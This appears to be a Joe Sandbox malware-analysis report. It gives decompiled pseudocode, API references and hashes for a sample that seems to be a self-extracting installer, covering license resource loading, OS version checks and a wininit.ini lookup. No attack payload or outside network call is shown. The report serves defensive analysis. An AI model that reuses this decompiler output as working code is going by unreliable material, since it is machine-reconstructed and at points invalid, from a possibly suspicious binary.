                                                                                                                                                                                                        								goto L12;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t40 =  &_v176;
                                                                                                                                                                                                        								if(E00DE66F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                        									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                        										 *0xde81d8 = _t41;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L12;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x00de692b
                                                                                                                                                                                                        0x00de6932
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de692b
                                                                                                                                                                                                        0x00de691c
                                                                                                                                                                                                        0x00de690a
                                                                                                                                                                                                        0x00de6885
                                                                                                                                                                                                        0x00de6876
                                                                                                                                                                                                        0x00de6951

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00DE686E
                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000004A), ref: 00DE68A7
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00DE68CC
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00DE1140,00000000,?,?,0000000C), ref: 00DE68F4
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00DE6902
                                                                                                                                                                                                          • Part of subcall function 00DE66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00DE691A), ref: 00DE6741
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Control Panel\Desktop\ResourceLocale, xrefs: 00DE68C2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                        • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                        • API String ID: 3346862599-1109908249
                                                                                                                                                                                                        • Opcode ID: 847e9c3d29fb98e589f27b976463e7bca9f6e96104aa8b872fb1c07a39a36aa8
                                                                                                                                                                                                        • Instruction ID: d2ff61d4c5ebadd7af616a0fb0d9cc2a2f274ae9d6c16d51966b7036182e1fca
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 847e9c3d29fb98e589f27b976463e7bca9f6e96104aa8b872fb1c07a39a36aa8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8318431A403A89FDB31EB16CC84BAA7778EB557A4F040195E94DEA241DB30DD85CF72
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE3A3F(void* __eflags) {
                                                                                                                                                                                                        				void* _t3;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				CHAR* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t16 = "LICENSE";
                                                                                                                                                                                                        				_t1 = E00DE468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                        				 *0xde8d4c = _t3;
                                                                                                                                                                                                        				if(_t3 != 0) {
                                                                                                                                                                                                        					_t19 = _t16;
                                                                                                                                                                                                        					if(E00DE468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                        						if(lstrcmpA( *0xde8d4c, "<None>") == 0) {
                                                                                                                                                                                                        							LocalFree( *0xde8d4c);
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							 *0xde9124 = 0;
                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t9 = E00DE6517(_t19, 0x7d1, 0, E00DE3100, 0, 0);
                                                                                                                                                                                                        						LocalFree( *0xde8d4c);
                                                                                                                                                                                                        						if(_t9 != 0) {
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xde9124 = 0x800704c7;
                                                                                                                                                                                                        						L2:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					E00DE44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					LocalFree( *0xde8d4c);
                                                                                                                                                                                                        					 *0xde9124 = 0x80070714;
                                                                                                                                                                                                        					goto L2;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00DE44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        				 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46A0
                                                                                                                                                                                                          • Part of subcall function 00DE468F: SizeofResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46A9
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46C3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LoadResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46CC
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LockResource.KERNEL32(00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46D3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: memcpy_s.MSVCRT ref: 00DE46E5
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00DE2F64,?,00000002,00000000), ref: 00DE3A5D
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00DE3AB3
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DE4518
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00DE4554
                                                                                                                                                                                                          • Part of subcall function 00DE6285: GetLastError.KERNEL32(00DE5BBC), ref: 00DE6285
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 00DE3AD0
                                                                                                                                                                                                        • LocalFree.KERNEL32 ref: 00DE3B13
                                                                                                                                                                                                          • Part of subcall function 00DE6517: FindResourceA.KERNEL32(00DE0000,000007D6,00000005), ref: 00DE652A
                                                                                                                                                                                                          • Part of subcall function 00DE6517: LoadResource.KERNEL32(00DE0000,00000000,?,?,00DE2EE8,00000000,00DE19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00DE6538
                                                                                                                                                                                                          • Part of subcall function 00DE6517: DialogBoxIndirectParamA.USER32(00DE0000,00000000,00000547,00DE19E0,00000000), ref: 00DE6557
                                                                                                                                                                                                          • Part of subcall function 00DE6517: FreeResource.KERNEL32(00000000,?,?,00DE2EE8,00000000,00DE19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00DE6560
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00DE3100,00000000,00000000), ref: 00DE3AF4
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$LICENSE
                                                                                                                                                                                                        • API String ID: 2414642746-383193767
                                                                                                                                                                                                        • Opcode ID: c9e9e3804d3501dd5f90d3b45e8687711d3d99621e77ddbfe7e8bbc8a85ff02e
                                                                                                                                                                                                        • Instruction ID: 1f7745c72572ae45a2488ea3e44ca32a983b50ec5a30e83e12daa8c354efeac1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9e9e3804d3501dd5f90d3b45e8687711d3d99621e77ddbfe7e8bbc8a85ff02e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 77117F303013C1AFD720BF37AC4DE2B7AA9DBD9750B10442EB646DE3A1DA79D8009674
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00DE24E0(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t7;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				long _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = __ebx;
                                                                                                                                                                                                        				_t7 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                        				_t25 = 0x104;
                                                                                                                                                                                                        				_t26 = 0;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					E00DE658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                        					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                        					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                        					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                        						_lclose(_t25);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00DE2506
                                                                                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00DE252C
                                                                                                                                                                                                        • _lopen.KERNEL32 ref: 00DE253B
                                                                                                                                                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00DE254C
                                                                                                                                                                                                        • _lclose.KERNEL32(00000000), ref: 00DE2555
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                        • String ID: wininit.ini
                                                                                                                                                                                                        • API String ID: 3273605193-4206010578
                                                                                                                                                                                                        • Opcode ID: f28c06267c832478de6376628186957094fb0258d4bf0c605803f4eda981464f
                                                                                                                                                                                                        • Instruction ID: 71368d0ba7eb6d061ebbbd7967065b9a6a012c15f76b8bf2b834dced81748dcc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f28c06267c832478de6376628186957094fb0258d4bf0c605803f4eda981464f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A01F5326002986BC720BB6A9C4DEEF7B7CDB81760F000155FA49D7290DE749E45CAB1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00DE36EE(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                        				signed int _v420;
                                                                                                                                                                                                        				signed int _v424;
                                                                                                                                                                                                        				CHAR* _v428;
                                                                                                                                                                                                        				CHAR* _v432;
                                                                                                                                                                                                        				signed int _v436;
                                                                                                                                                                                                        				CHAR* _v440;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                                        				CHAR* _t77;
                                                                                                                                                                                                        				CHAR* _t91;
                                                                                                                                                                                                        				CHAR* _t94;
                                                                                                                                                                                                        				int _t97;
                                                                                                                                                                                                        				CHAR* _t98;
                                                                                                                                                                                                        				signed char _t99;
                                                                                                                                                                                                        				CHAR* _t104;
                                                                                                                                                                                                        				signed short _t107;
                                                                                                                                                                                                        				signed int _t109;
                                                                                                                                                                                                        				short _t113;
                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                        				signed char _t115;
                                                                                                                                                                                                        				short _t119;
                                                                                                                                                                                                        				CHAR* _t123;
                                                                                                                                                                                                        				CHAR* _t124;
                                                                                                                                                                                                        				CHAR* _t129;
                                                                                                                                                                                                        				signed int _t131;
                                                                                                                                                                                                        				signed int _t132;
                                                                                                                                                                                                        				CHAR* _t135;
                                                                                                                                                                                                        				CHAR* _t138;
                                                                                                                                                                                                        				signed int _t139;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t72 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                        				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        				_t115 = __ecx;
                                                                                                                                                                                                        				_t135 = 0;
                                                                                                                                                                                                        				_v432 = __ecx;
                                                                                                                                                                                                        				_t138 = 0;
                                                                                                                                                                                                        				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                        					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                        					_t119 = 2;
                                                                                                                                                                                                        					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                        					__eflags = _t77;
                                                                                                                                                                                                        					if(_t77 == 0) {
                                                                                                                                                                                                        						_t119 = 0;
                                                                                                                                                                                                        						__eflags = 1;
                                                                                                                                                                                                        						 *0xde8184 = 1;
                                                                                                                                                                                                        						 *0xde8180 = 1;
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						 *0xde9a40 = _t119;
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						__eflags =  *0xde8a34 - _t138; // 0x0
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t115;
                                                                                                                                                                                                        						if(_t115 == 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_v428 = _t135;
                                                                                                                                                                                                        						__eflags = _t119;
                                                                                                                                                                                                        						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                        						_t11 =  &_v420;
                                                                                                                                                                                                        						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                        						__eflags =  *_t11;
                                                                                                                                                                                                        						_v440 = _t115;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_v424 = _t135 * 0x18;
                                                                                                                                                                                                        							_v436 = E00DE2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                        							_t91 = E00DE2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                        							_t123 = _v436;
                                                                                                                                                                                                        							_t133 = 0x54d;
                                                                                                                                                                                                        							__eflags = _t123;
                                                                                                                                                                                                        							if(_t123 < 0) {
                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                        								__eflags = _v420 - 1;
                                                                                                                                                                                                        								if(_v420 == 1) {
                                                                                                                                                                                                        									_t138 = 0x54c;
                                                                                                                                                                                                        									L36:
                                                                                                                                                                                                        									__eflags = _t138;
                                                                                                                                                                                                        									if(_t138 != 0) {
                                                                                                                                                                                                        										L40:
                                                                                                                                                                                                        										__eflags = _t138 - _t133;
                                                                                                                                                                                                        										if(_t138 == _t133) {
                                                                                                                                                                                                        											L30:
                                                                                                                                                                                                        											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                        											_t115 = 0;
                                                                                                                                                                                                        											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                        											__eflags = _t138 - _t133;
                                                                                                                                                                                                        											_t133 = _v432;
                                                                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                                                                        												_t124 = _v440;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                        												_v420 =  &_v268;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t124;
                                                                                                                                                                                                        											if(_t124 == 0) {
                                                                                                                                                                                                        												_t135 = _v436;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t99 = _t124[0x30];
                                                                                                                                                                                                        												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                        												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                        												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                        													asm("sbb ebx, ebx");
                                                                                                                                                                                                        													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t115 = 0x104;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0xde8a38 & 0x00000001;
                                                                                                                                                                                                        											if(( *0xde8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                        												L64:
                                                                                                                                                                                                        												_push(0);
                                                                                                                                                                                                        												_push(0x30);
                                                                                                                                                                                                        												_push(_v420);
                                                                                                                                                                                                        												_push("cent");
                                                                                                                                                                                                        												goto L65;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												__eflags = _t135;
                                                                                                                                                                                                        												if(_t135 == 0) {
                                                                                                                                                                                                        													goto L64;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												__eflags =  *_t135;
                                                                                                                                                                                                        												if( *_t135 == 0) {
                                                                                                                                                                                                        													goto L64;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												MessageBeep(0);
                                                                                                                                                                                                        												_t94 = E00DE681F(_t115);
                                                                                                                                                                                                        												__eflags = _t94;
                                                                                                                                                                                                        												if(_t94 == 0) {
                                                                                                                                                                                                        													L57:
                                                                                                                                                                                                        													0x180030 = 0x30;
                                                                                                                                                                                                        													L58:
                                                                                                                                                                                                        													_t97 = MessageBoxA(0, _t135, "cent", 0x00180030 | _t115);
                                                                                                                                                                                                        													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                        													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                        														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                        														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                        															goto L66;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														__eflags = _t97 - 1;
                                                                                                                                                                                                        														L62:
                                                                                                                                                                                                        														if(__eflags == 0) {
                                                                                                                                                                                                        															_t138 = 0;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L66;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													__eflags = _t97 - 6;
                                                                                                                                                                                                        													goto L62;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t98 = E00DE67C9(_t124, _t124);
                                                                                                                                                                                                        												__eflags = _t98;
                                                                                                                                                                                                        												if(_t98 == 0) {
                                                                                                                                                                                                        													goto L57;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L58;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                        										if(_t138 == 0x54c) {
                                                                                                                                                                                                        											goto L30;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t138;
                                                                                                                                                                                                        										if(_t138 == 0) {
                                                                                                                                                                                                        											goto L66;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t135 = 0;
                                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                                        										goto L44;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L37:
                                                                                                                                                                                                        									_t129 = _v432;
                                                                                                                                                                                                        									__eflags = _t129[0x7c];
                                                                                                                                                                                                        									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                        										goto L66;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t133 =  &_v268;
                                                                                                                                                                                                        									_t104 = E00DE28E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                        									__eflags = _t104;
                                                                                                                                                                                                        									if(_t104 != 0) {
                                                                                                                                                                                                        										goto L66;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t135 = _v428;
                                                                                                                                                                                                        									_t133 = 0x54d;
                                                                                                                                                                                                        									_t138 = 0x54d;
                                                                                                                                                                                                        									goto L40;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L33;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t91;
                                                                                                                                                                                                        							if(_t91 > 0) {
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t123;
                                                                                                                                                                                                        							if(_t123 != 0) {
                                                                                                                                                                                                        								__eflags = _t91;
                                                                                                                                                                                                        								if(_t91 != 0) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                        								L27:
                                                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								L28:
                                                                                                                                                                                                        								__eflags = _t135;
                                                                                                                                                                                                        								if(_t135 == 0) {
                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t138 = 0x54c;
                                                                                                                                                                                                        								goto L30;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t91;
                                                                                                                                                                                                        							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                        							if(_t91 != 0) {
                                                                                                                                                                                                        								_t131 = _v424;
                                                                                                                                                                                                        								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                        								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                        							_t109 = _v424;
                                                                                                                                                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                        							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                        							goto L27;
                                                                                                                                                                                                        							L33:
                                                                                                                                                                                                        							_t135 =  &(_t135[1]);
                                                                                                                                                                                                        							_v428 = _t135;
                                                                                                                                                                                                        							_v420 = _t135;
                                                                                                                                                                                                        							__eflags = _t135 - 2;
                                                                                                                                                                                                        						} while (_t135 < 2);
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t77 == 1;
                                                                                                                                                                                                        					if(_t77 == 1) {
                                                                                                                                                                                                        						 *0xde9a40 = _t119;
                                                                                                                                                                                                        						 *0xde8184 = 1;
                                                                                                                                                                                                        						 *0xde8180 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - 3;
                                                                                                                                                                                                        						if(_t133 > 3) {
                                                                                                                                                                                                        							__eflags = _t133 - 5;
                                                                                                                                                                                                        							if(_t133 < 5) {
                                                                                                                                                                                                        								goto L14;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t113 = 3;
                                                                                                                                                                                                        							_t119 = _t113;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t119 = 1;
                                                                                                                                                                                                        						_t114 = 3;
                                                                                                                                                                                                        						 *0xde9a40 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - _t114;
                                                                                                                                                                                                        						if(__eflags < 0) {
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							 *0xde8184 = _t135;
                                                                                                                                                                                                        							 *0xde8180 = _t135;
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                        						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t138 = 0x4ca;
                                                                                                                                                                                                        					goto L44;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t138 = 0x4b4;
                                                                                                                                                                                                        					L44:
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					L65:
                                                                                                                                                                                                        					_t133 = _t138;
                                                                                                                                                                                                        					E00DE44B9(0, _t138);
                                                                                                                                                                                                        					L66:
                                                                                                                                                                                                        					return E00DE6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





































                                                                                                                                                                                                        0x00de38a9
                                                                                                                                                                                                        0x00de38a9
                                                                                                                                                                                                        0x00de38b0
                                                                                                                                                                                                        0x00de38b2
                                                                                                                                                                                                        0x00de38b9
                                                                                                                                                                                                        0x00de38bb
                                                                                                                                                                                                        0x00de38c1
                                                                                                                                                                                                        0x00de3975
                                                                                                                                                                                                        0x00de38c7
                                                                                                                                                                                                        0x00de38de
                                                                                                                                                                                                        0x00de38e0
                                                                                                                                                                                                        0x00de38e0
                                                                                                                                                                                                        0x00de397b
                                                                                                                                                                                                        0x00de397d
                                                                                                                                                                                                        0x00de39a9
                                                                                                                                                                                                        0x00de397f
